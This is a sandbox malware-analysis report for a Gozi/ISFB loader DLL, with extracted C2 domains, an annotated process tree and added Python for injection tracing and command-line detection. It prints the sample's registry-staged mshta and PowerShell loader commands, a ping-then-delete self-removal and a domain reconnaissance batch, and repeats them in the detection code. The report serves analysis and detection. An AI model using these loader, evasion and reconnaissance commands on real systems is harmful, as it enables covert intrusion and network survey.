Analysis

Max time kernel: 143s
Max time network: 122s
Platform: windows7_x64
Resource: win7-en-20211208
Submitted: 24/01/2022, 10:09

Tasks
  Static task: static1
  Behavioral task: behavioral1
    Sample: 61ee6edf7de65.dll
    Resource: win7-en-20211208
  0 signatures, 0 seconds
General

Target: 61ee6edf7de65.dll
Size: 95KB
MD5: b6f0fc5638a110abac1a54805f77e786
SHA1: f7eff5f67b1b794759ec0ba9b0d6a3bd5cd59bfe
SHA256: 06e26611fe5cf2fb04cfa894f9cb24edc0ab8306cf42c979b2c776372d07d1cf
SHA512: b92f671821476bb041bd96a38b1ff300365d12d2fb6bec6266cfbd0f7613a3551807ddc3887ebee13911843322c3274af2a65ca1c38291b45506b433cccd15a8
Malware Config

Two configurations were extracted, one per stage. They are identical except for base_path and exe_type.

Extracted (stage 1)
  Family: gozi_ifsb
  Botnet: 20000
  C2:
    giporedtrip.at
    habpfans.at
  Attributes:
    base_path: /drew/
    build: 260224
    exe_type: loader
    extension: .jlk
    server_id: 50
  Also present (values not reproduced on this page): rsa_pubkey.plain, aes.plain

Extracted (stage 2)
  Family: gozi_ifsb
  Botnet: 20000
  C2:
    giporedtrip.at
    habpfans.at
  Attributes:
    base_path: /images/
    build: 260224
    exe_type: worker
    extension: .jlk
    server_id: 50
  Also present (values not reproduced on this page): rsa_pubkey.plain, aes.plain

The shared botnet id, build, server_id, C2 hosts and URI extension tie the loader configuration and the worker configuration to the same campaign; only the URI prefix (base_path) differs between the two stages. Both hosts belong on the block list together, and a URI ending in .jlk under /drew/ or /images/ on either host is the network pattern to hunt for.
Signatures

Blocklisted process makes network request (3 IoCs)
  flow 3: PID 2040, rundll32.exe
  flow 4: PID 2040, rundll32.exe
  flow 5: PID 2040, rundll32.exe

Deletes itself (1 IoC)
  PID 1592, cmd.exe

Drops file in System32 directory (1 IoC)
  File opened for modification: C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (powershell.exe)
  Caveat: this is the Windows PowerShell Start Menu shortcut that powershell.exe itself opens when it starts; the unexpanded %ProgramData% under System32 reflects the working directory at the time. It is a side effect of running PowerShell, not a file dropped by the sample.

Suspicious use of SetThreadContext (4 IoCs)
  Each row is "PID <pid> set thread context of <target pid>".
  pid   process         target pid  procid_target
  1048  powershell.exe  1284        14
  1284  Explorer.EXE    1592        38
  1592  cmd.exe         916         40
  1284  Explorer.EXE    1832        50

Enumerates physical storage devices (1 TTP)
  Sandbox description: attempts to interact with connected storage/optical drive(s), likely ransomware behaviour.
  Caveat: the ransomware wording is the sandbox's generic text for this signature. Nothing else in the run supports it (no file encryption, no ransom note), and the extracted configuration identifies the family as Gozi/ISFB.

Discovers systems in the same network (1 TTP, 3 IoCs)
  PID 1240, net.exe
  PID 1544, net.exe
  PID 1592, net.exe

Enumerates processes with tasklist (1 TTP, 1 IoC)
  PID 1584, tasklist.exe

Gathers system information (1 TTP, 1 IoC)
  Runs systeminfo.exe.
  PID 1368, systeminfo.exe

Modifies Internet Explorer settings
  Key created: \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main (mshta.exe)
  Caveat: mshta.exe hosts HTAs in the Internet Explorer engine, so creation of this key is a side effect of running the inline HTA rather than a deliberate settings change.

Runs net.exe
  (see the net.exe processes listed under "Discovers systems in the same network")

Runs ping.exe (1 TTP, 1 IoC)
  PID 916, PING.EXE

Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  PID 916, PING.EXE

Suspicious behavior: EnumeratesProcesses (5 IoCs)
  PID 2040, rundll32.exe
  PID 1048, powershell.exe
  PID 1284, Explorer.EXE (three hits)

Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  PID 1284, Explorer.EXE

Suspicious behavior: MapViewOfSection (4 IoCs)
  PID 1048, powershell.exe
  PID 1284, Explorer.EXE
  PID 1592, cmd.exe
  PID 1284, Explorer.EXE

Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Token: SeDebugPrivilege, PID 1048, powershell.exe
  Token: SeDebugPrivilege, PID 1584, tasklist.exe

Suspicious use of SetWindowsHookEx (1 IoC)
  PID 1284, Explorer.EXE

Suspicious use of WriteProcessMemory (64 IoCs)
  The page lists one row per call ("PID <pid> wrote to memory of <target pid>" with pid, process and procid_target columns). Identical rows are collapsed here with a call count; the 17 distinct edges sum to the 64 rows.

  pid   process         target pid  procid_target  calls
  1900  rundll32.exe    2040        27             7
  1176  mshta.exe       1048        31             3
  1048  powershell.exe  1028        34             3
  1028  csc.exe         1888        35             3
  1048  powershell.exe  752         36             3
  752   csc.exe         264         37             3
  1048  powershell.exe  1284        14             3
  1284  Explorer.EXE    1592        38             6
  1592  cmd.exe         916         40             6
  1284  Explorer.EXE    1612        41             3
  1612  cmd.exe         1072        43             3
  1284  Explorer.EXE    1020        44             3
  1284  Explorer.EXE    748         46             3
  748   cmd.exe         1368        48             3
  1284  Explorer.EXE    1832        50             7
  1284  Explorer.EXE    1800        52             3
  1284  Explorer.EXE    980         54             2

  Reading the table: the three-call parent-to-child writes (csc.exe into cvtres.exe, Explorer.EXE into its cmd.exe children) are consistent with ordinary process creation as this sandbox logs it. The edges that also appear under SetThreadContext (1048 -> 1284, 1284 -> 1592, 1592 -> 916, 1284 -> 1832) are the injection steps: PowerShell into Explorer.EXE, and from the injected Explorer.EXE into the cmd.exe/PING.EXE chain and into the 32-bit cmd.exe (PID 1832).
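The SetThreadContext and WriteProcessMemory tables are most useful when joined: a source that does both to the same target has put code into it. The Python below is an added example, not part of the sandbox report or of the sample. Its rows are constructed from the two tables above (call counts as collapsed there); the TARGET_IMAGE labels, the function names and the "both APIs from one source equals injection" heuristic are this example's own assumptions.

```python
"""Reconstruct injection edges from sandbox API-call IoCs.

Added example for this report, not code from the sandbox or the sample.
Heuristic: a process that both writes into another process's memory and
sets a thread context in it has injected code there (remote thread,
hollowing, or hook-and-inject into a child). A write without a matching
SetThreadContext (csc.exe -> cvtres.exe, Explorer.EXE -> its cmd.exe
children) is how plain process creation appears in this log and is
deliberately not reported.
"""
from collections import defaultdict

# (source pid, source image, target pid) for each SetThreadContext row.
THREAD_CONTEXT = [
    (1048, "powershell.exe", 1284),
    (1284, "Explorer.EXE", 1592),
    (1592, "cmd.exe", 916),
    (1284, "Explorer.EXE", 1832),
]

# (source pid, source image, target pid, WriteProcessMemory call count),
# constructed from the report's 64 rows.
WRITES = [
    (1900, "rundll32.exe", 2040, 7),
    (1176, "mshta.exe", 1048, 3),
    (1048, "powershell.exe", 1028, 3),
    (1028, "csc.exe", 1888, 3),
    (1048, "powershell.exe", 752, 3),
    (752, "csc.exe", 264, 3),
    (1048, "powershell.exe", 1284, 3),
    (1284, "Explorer.EXE", 1592, 6),
    (1592, "cmd.exe", 916, 6),
    (1284, "Explorer.EXE", 1612, 3),
    (1612, "cmd.exe", 1072, 3),
    (1284, "Explorer.EXE", 1020, 3),
    (1284, "Explorer.EXE", 748, 3),
    (748, "cmd.exe", 1368, 3),
    (1284, "Explorer.EXE", 1832, 7),
    (1284, "Explorer.EXE", 1800, 3),
    (1284, "Explorer.EXE", 980, 2),
]

# Image of each injection target at the time of the call, taken from the
# process tree. PIDs are recycled later in the run, so this is keyed by
# the first process that held the PID (an assumption of this example).
TARGET_IMAGE = {
    1284: "Explorer.EXE",
    1592: "cmd.exe (ping && del)",
    916: "PING.EXE",
    1832: "cmd.exe (SysWOW64, 'pause dll mail, ,')",
}


def find_injections(thread_ctx, writes):
    """Return (src_pid, src_image, dst_pid, dst_image, write_calls) for every
    target that received both SetThreadContext and WriteProcessMemory from
    the same source process."""
    calls = defaultdict(int)
    for src, _img, dst, n in writes:
        calls[(src, dst)] += n
    edges = []
    for src, src_img, dst in thread_ctx:
        n = calls.get((src, dst), 0)
        if n:
            edges.append((src, src_img, dst, TARGET_IMAGE.get(dst, "?"), n))
    return edges


def injection_chain(edges, root_pid):
    """PIDs that end up hosting code injected, directly or transitively,
    from root_pid (depth-first walk over the injection edges)."""
    reached, frontier = [], [root_pid]
    while frontier:
        cur = frontier.pop()
        for src, _si, dst, _di, _n in edges:
            if src == cur and dst not in reached:
                reached.append(dst)
                frontier.append(dst)
    return reached


if __name__ == "__main__":
    found = find_injections(THREAD_CONTEXT, WRITES)
    for src, si, dst, di, n in found:
        print(f"{si} ({src}) -> {di} ({dst}): SetThreadContext + {n} writes")
    print("hosts reached from powershell.exe 1048:", injection_chain(found, 1048))
```

Run stand-alone it prints the four injection edges and shows that everything injected from PowerShell ends up in Explorer.EXE and, from there, in the two cmd.exe hosts and PING.EXE; rundll32.exe's seven writes into its SysWOW64 child are not reported because no SetThreadContext accompanies them in the tables.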
Processes

Indentation reproduces the parent/child depth the sandbox rendered (Explorer.EXE at the root). Several PIDs (2040, 1612, 1592, 1240, 308, 1496) appear more than once because Windows reuses the PID of an exited process; when matching these entries against the signature tables, go by start order or the sandbox's procid rather than by PID alone.

C:\Windows\Explorer.EXE  (PID 1284)
  cmd: C:\Windows\Explorer.EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  C:\Windows\system32\rundll32.exe  (PID 1900)
    cmd: rundll32.exe C:\Users\Admin\AppData\Local\Temp\61ee6edf7de65.dll,#1
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\rundll32.exe  (PID 2040)
      cmd: rundll32.exe C:\Users\Admin\AppData\Local\Temp\61ee6edf7de65.dll,#1
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      Note: the 64-bit rundll32.exe re-launches the same command through its 32-bit copy in SysWOW64, which is what rundll32 does when handed a 32-bit DLL. This child is the one that makes the network requests (flows 3 to 5).

  C:\Windows\System32\mshta.exe  (PID 1176)
    cmd: "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Shva='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Shva).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\A97B9ACF-F490-C387-46ED-68A7DA711CCB\\\StartDevice'));if(!window.flag)close()</script>"
    - Modifies Internet Explorer settings
    - Suspicious use of WriteProcessMemory
    Note: the HTA is passed inline (about:), shrinks its window to nothing and evals whatever is stored in the StartDevice value of that registry key. The next stage therefore lives in the registry, not in a file.

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1048)
      cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name micdnux -value gp; new-alias -name wsfkguhx -value iex; wsfkguhx ([System.Text.Encoding]::ASCII.GetString((micdnux "HKCU:Software\AppDataLow\Software\Microsoft\A97B9ACF-F490-C387-46ED-68A7DA711CCB").OptionsAbout))
      - Drops file in System32 directory
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      Note: the aliases hide Get-ItemProperty (gp) and Invoke-Expression (iex). The script reads the OptionsAbout value of the same key, decodes it as ASCII and executes it. The two csc.exe children are that script compiling C# at runtime, and the SetThreadContext/WriteProcessMemory into PID 1284 is the injection into Explorer.EXE from which every process below is started.

      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe  (PID 1028)
        cmd: "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ffdjt0df.cmdline"
        - Suspicious use of WriteProcessMemory

        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe  (PID 1888)
          cmd: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES52D2.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC52C2.tmp"

      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe  (PID 752)
        cmd: "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\7cp2lteu.cmdline"
        - Suspicious use of WriteProcessMemory

        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe  (PID 264)
          cmd: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES535F.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC535E.tmp"

  C:\Windows\System32\cmd.exe  (PID 1592)
    cmd: "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\61ee6edf7de65.dll"
    - Deletes itself
    - Suspicious use of SetThreadContext
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\PING.EXE  (PID 916)
      cmd: ping localhost -n 5
      - Runs ping.exe
      - Suspicious behavior: CmdExeWriteProcessMemorySpam

  C:\Windows\system32\cmd.exe  (PID 1612)
    cmd: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\B840.bi1"
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\nslookup.exe  (PID 1072)
      cmd: nslookup myip.opendns.com resolver1.opendns.com

  C:\Windows\system32\cmd.exe  (PID 1020)
    cmd: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B840.bi1"

  C:\Windows\system32\cmd.exe  (PID 748)
    cmd: cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\4868.bin1"
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\systeminfo.exe  (PID 1368)
      cmd: systeminfo.exe
      - Gathers system information

  C:\Windows\syswow64\cmd.exe  (PID 1832)
    cmd: "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
    Note: the command line is nonsense as a command, but the signature tables record Explorer.EXE setting this process's thread context and writing to its memory seven times. The 32-bit cmd.exe is being used as a host for injected code, not to run pause.

  C:\Windows\system32\cmd.exe  (PID 1800)
    cmd: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

  C:\Windows\system32\cmd.exe  (PID 980)
    cmd: cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

    C:\Windows\system32\net.exe  (PID 1240)
      cmd: net view
      - Discovers systems in the same network

  C:\Windows\system32\cmd.exe  (PID 520)
    cmd: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

  C:\Windows\system32\cmd.exe  (PID 2040)
    cmd: cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

    C:\Windows\system32\nslookup.exe  (PID 1604)
      cmd: nslookup 127.0.0.1

  C:\Windows\system32\cmd.exe  (PID 1720)
    cmd: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

  C:\Windows\system32\cmd.exe  (PID 1612)
    cmd: cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

    C:\Windows\system32\tasklist.exe  (PID 1584)
      cmd: tasklist.exe /SVC
      - Enumerates processes with tasklist
      - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\cmd.exe  (PID 308)
    cmd: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

  C:\Windows\system32\cmd.exe  (PID 1620)
    cmd: cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

    C:\Windows\system32\driverquery.exe  (PID 912)
      cmd: driverquery.exe

  C:\Windows\system32\cmd.exe  (PID 1776)
    cmd: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

  C:\Windows\system32\cmd.exe  (PID 1404)
    cmd: cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

    C:\Windows\system32\reg.exe  (PID 440)
      cmd: reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s

  C:\Windows\system32\cmd.exe  (PID 1496)
    cmd: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

  C:\Windows\system32\cmd.exe  (PID 1668)
    cmd: cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

    C:\Windows\system32\net.exe  (PID 1960)
      cmd: net config workstation

      C:\Windows\system32\net1.exe  (PID 1240)
        cmd: C:\Windows\system32\net1 config workstation

  C:\Windows\system32\cmd.exe  (PID 768)
    cmd: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

  C:\Windows\system32\cmd.exe  (PID 1416)
    cmd: cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

    C:\Windows\system32\nltest.exe  (PID 2040)
      cmd: nltest /domain_trusts

  C:\Windows\system32\cmd.exe  (PID 1616)
    cmd: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

  C:\Windows\system32\cmd.exe  (PID 1508)
    cmd: cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

    C:\Windows\system32\nltest.exe  (PID 1384)
      cmd: nltest /domain_trusts /all_trusts

  C:\Windows\system32\cmd.exe  (PID 1552)
    cmd: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

  C:\Windows\system32\cmd.exe  (PID 308)
    cmd: cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

    C:\Windows\system32\net.exe  (PID 1544)
      cmd: net view /all /domain
      - Discovers systems in the same network

  C:\Windows\system32\cmd.exe  (PID 1740)
    cmd: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

  C:\Windows\system32\cmd.exe  (PID 1736)
    cmd: cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

    C:\Windows\system32\net.exe  (PID 1592)
      cmd: net view /all
      - Discovers systems in the same network

  C:\Windows\system32\cmd.exe  (PID 816)
    cmd: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

  C:\Windows\system32\cmd.exe  (PID 1496)
    cmd: cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\4868.bin1 > C:\Users\Admin\AppData\Local\Temp\4868.bin & del C:\Users\Admin\AppData\Local\Temp\4868.bin1"

Summary of the chain as the tree shows it: rundll32.exe loads export #1 of the DLL; mshta.exe and powershell.exe pull the next stages from the HKCU\Software\AppDataLow\Software\Microsoft\A97B9ACF-F490-C387-46ED-68A7DA711CCB key (values StartDevice and OptionsAbout), so the stages between the DLL and the injected code are staged in the registry rather than dropped as files, and the DLL itself is deleted after a five-ping delay. PowerShell injects into Explorer.EXE, and the injected Explorer.EXE runs the survey: the external IP lookup (myip.opendns.com via resolver1.opendns.com) goes to B840.bi1, while the host and domain survey (systeminfo, net view, nslookup, tasklist /SVC, driverquery, the installed-software Uninstall key, net config workstation, nltest trust enumeration) is appended to 4868.bin1 with "--------" separators, then copied with cmd /U (Unicode output) to 4868.bin and the .bin1 deleted. For hunting, the registry key and value names, the .bin/.bin1/.bi1 temp files and the echo-separated survey batch launched from Explorer.EXE are more durable indicators than the PIDs.
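The command lines in the tree are the raw material for detection rules. The Python below is an added example, not code from the sandbox or from the sample: EVENTS is a constructed process-creation log (pid, parent pid, image, command line) built from the process tree above; the rule names, the DISCOVERY tool list and the min_tools threshold are this example's own choices. It flags the inline-HTA mshta launcher that reads a registry value, the PowerShell alias trick that executes a registry value, the ping-then-del self-deletion, runtime C# compilation under PowerShell, and a burst of discovery tools redirected into one temp file by one parent.

```python
"""Command-line detections for the execution chain in this report.

Added example; not code from the sandbox or from the sample. EVENTS is a
constructed process-creation log built from the process tree above; rule
names, the DISCOVERY tool list and the min_tools threshold are this
example's own choices.
"""
import re
from collections import defaultdict

TEMP = r"C:\Users\Admin\AppData\Local\Temp"
OUT = TEMP + r"\4868.bin1"

MSHTA = (r'''"C:\Windows\System32\mshta.exe" "about:<hta:application><script>'''
         r'''Shva='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Shva)'''
         r'''.regread('HKCU\\Software\\AppDataLow\\Software\\Microsoft'''
         r'''\\A97B9ACF-F490-C387-46ED-68A7DA711CCB\\StartDevice'));'''
         r'''if(!window.flag)close()</script>"''')
PS = (r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
      r'new-alias -name micdnux -value gp; new-alias -name wsfkguhx -value iex; '
      r'wsfkguhx ([System.Text.Encoding]::ASCII.GetString((micdnux "HKCU:Software'
      r'\AppDataLow\Software\Microsoft\A97B9ACF-F490-C387-46ED-68A7DA711CCB").OptionsAbout))')

# (pid, parent pid, image, command line); constructed from the tree above.
EVENTS = [
    (1284, 0, "Explorer.EXE", r"C:\Windows\Explorer.EXE"),
    (1176, 1284, "mshta.exe", MSHTA),
    (1048, 1176, "powershell.exe", PS),
    (1028, 1048, "csc.exe", rf'"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"{TEMP}\ffdjt0df.cmdline"'),
    (1592, 1284, "cmd.exe", rf'"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "{TEMP}\61ee6edf7de65.dll"'),
    (1612, 1284, "cmd.exe", rf'cmd /C "nslookup myip.opendns.com resolver1.opendns.com > {TEMP}\B840.bi1"'),
    (748, 1284, "cmd.exe", f'cmd /C "systeminfo.exe > {OUT}"'),
    (1800, 1284, "cmd.exe", f'cmd /C "echo -------- >> {OUT}"'),
    (980, 1284, "cmd.exe", f'cmd /C "net view >> {OUT}"'),
    (2040, 1284, "cmd.exe", f'cmd /C "nslookup 127.0.0.1 >> {OUT}"'),
    (1612, 1284, "cmd.exe", f'cmd /C "tasklist.exe /SVC >> {OUT}"'),
    (1620, 1284, "cmd.exe", f'cmd /C "driverquery.exe >> {OUT}"'),
    (1404, 1284, "cmd.exe", f'cmd /C "reg.exe query "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall" /s >> {OUT}"'),
    (1668, 1284, "cmd.exe", f'cmd /C "net config workstation >> {OUT}"'),
    (1416, 1284, "cmd.exe", f'cmd /C "nltest /domain_trusts >> {OUT}"'),
    (1508, 1284, "cmd.exe", f'cmd /C "nltest /domain_trusts /all_trusts >> {OUT}"'),
    (308, 1284, "cmd.exe", f'cmd /C "net view /all /domain >> {OUT}"'),
    (1736, 1284, "cmd.exe", f'cmd /C "net view /all >> {OUT}"'),
    (1496, 1284, "cmd.exe", rf'cmd /U /C "type {OUT} > {TEMP}\4868.bin & del {OUT}"'),
]

DISCOVERY = re.compile(
    r"\b(systeminfo|net\s+view|net\s+config|nltest|tasklist|driverquery|"
    r"reg(?:\.exe)?\s+query|nslookup|whoami|ipconfig)\b", re.I)
# Output file of a '>' or '>>' redirection inside a cmd /C string.
REDIRECT = re.compile(r'>>?\s*"?([A-Za-z]:\\[^"&|]+?)\s*"?\s*(?:&|$)')


def classify(event, images):
    """Per-event rules; returns the list of rule descriptions that fired."""
    pid, ppid, image, cmd = event
    img, low, hits = image.lower(), cmd.lower(), []
    if img == "mshta.exe" and "<hta:application>" in low and ".regread(" in low:
        hits.append("mshta: inline HTA evaluates a registry value")
    if img == "powershell.exe" and "hkcu:" in low and re.search(
            r"new-alias\s+-name\s+\S+\s+-value\s+(?:iex|invoke-expression)\b", low):
        hits.append("powershell: aliased Invoke-Expression over registry data")
    if img == "cmd.exe" and re.search(r"\bping\s+\S+\s+-n\s+\d+\b.*&&\s*del\b", low):
        hits.append("cmd: delayed self-deletion (ping ... && del)")
    if img == "csc.exe" and images.get(ppid, "").lower() == "powershell.exe":
        hits.append("csc: C# compiled at runtime under PowerShell")
    return hits


def scan(events):
    """(pid, image, rule) for every rule that fired, in event order."""
    images = {pid: image for pid, _ppid, image, _cmd in events}
    return [(pid, image, hit) for pid, ppid, image, cmd in events
            for hit in classify((pid, ppid, image, cmd), images)]


def recon_batches(events, min_tools=5):
    """Discovery commands grouped by (parent pid, redirect target); returns
    the groups that used at least min_tools distinct tools."""
    tools = defaultdict(set)
    for _pid, ppid, image, cmd in events:
        if image.lower() != "cmd.exe":
            continue
        tool, target = DISCOVERY.search(cmd), REDIRECT.search(cmd)
        if tool and target:
            tools[(ppid, target.group(1))].add(re.sub(r"\s+", " ", tool.group(1).lower()))
    return {key: sorted(used) for key, used in tools.items() if len(used) >= min_tools}


if __name__ == "__main__":
    for pid, image, hit in scan(EVENTS):
        print(f"{pid:>5}  {image:<15} {hit}")
    for (ppid, path), used in recon_batches(EVENTS).items():
        print(f"recon batch: parent {ppid} -> {path}: {', '.join(used)}")
```

The per-event rules are keyed on what the command lines do rather than on the random alias and value names, which change per build; the batch rule groups on the parent and the redirect target so that the single external-IP lookup into B840.bi1 stays below threshold while the eight-tool survey into 4868.bin1 is reported, even though the echo separators and the final type/del command share the same parent.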